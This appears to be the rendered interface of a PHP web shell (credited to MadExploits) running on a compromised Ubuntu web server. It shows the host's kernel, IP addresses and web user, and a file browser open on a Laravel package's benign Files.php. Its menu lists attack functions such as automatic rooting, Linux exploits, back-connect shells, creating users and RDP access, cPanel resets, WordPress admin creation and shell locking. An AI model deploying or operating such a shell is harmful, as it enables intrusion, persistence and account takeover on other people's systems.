Linux 5474007-topit 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
Apache/2.4.52 (Ubuntu)
: 85.198.82.39 | : 216.73.216.129
Cant Read [ /etc/named.conf ]
8.3.30
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
back /
vendor /
laravel /
pail /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Console
[ DIR ]
drwxr-xr-x
Contracts
[ DIR ]
drwxr-xr-x
Guards
[ DIR ]
drwxr-xr-x
Printers
[ DIR ]
drwxr-xr-x
ValueObjects
[ DIR ]
drwxr-xr-x
File.php
1.86
KB
-rw-r--r--
Files.php
540
B
-rw-r--r--
Handler.php
4.24
KB
-rw-r--r--
LoggerFactory.php
652
B
-rw-r--r--
Options.php
2.05
KB
-rw-r--r--
PailServiceProvider.php
2.34
KB
-rw-r--r--
ProcessFactory.php
1.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Files.php
<?php namespace Laravel\Pail; use Illuminate\Support\Collection; class Files { /** * Creates a new instance of the files. */ public function __construct( protected string $path, ) { // } /** * Returns the list of files. * * @return \Illuminate\Support\Collection<int, File> */ public function all(): Collection { $files = glob($this->path.'/*.pail') ?: []; return collect($files) ->map(fn (string $file) => new File($file)); } }
Close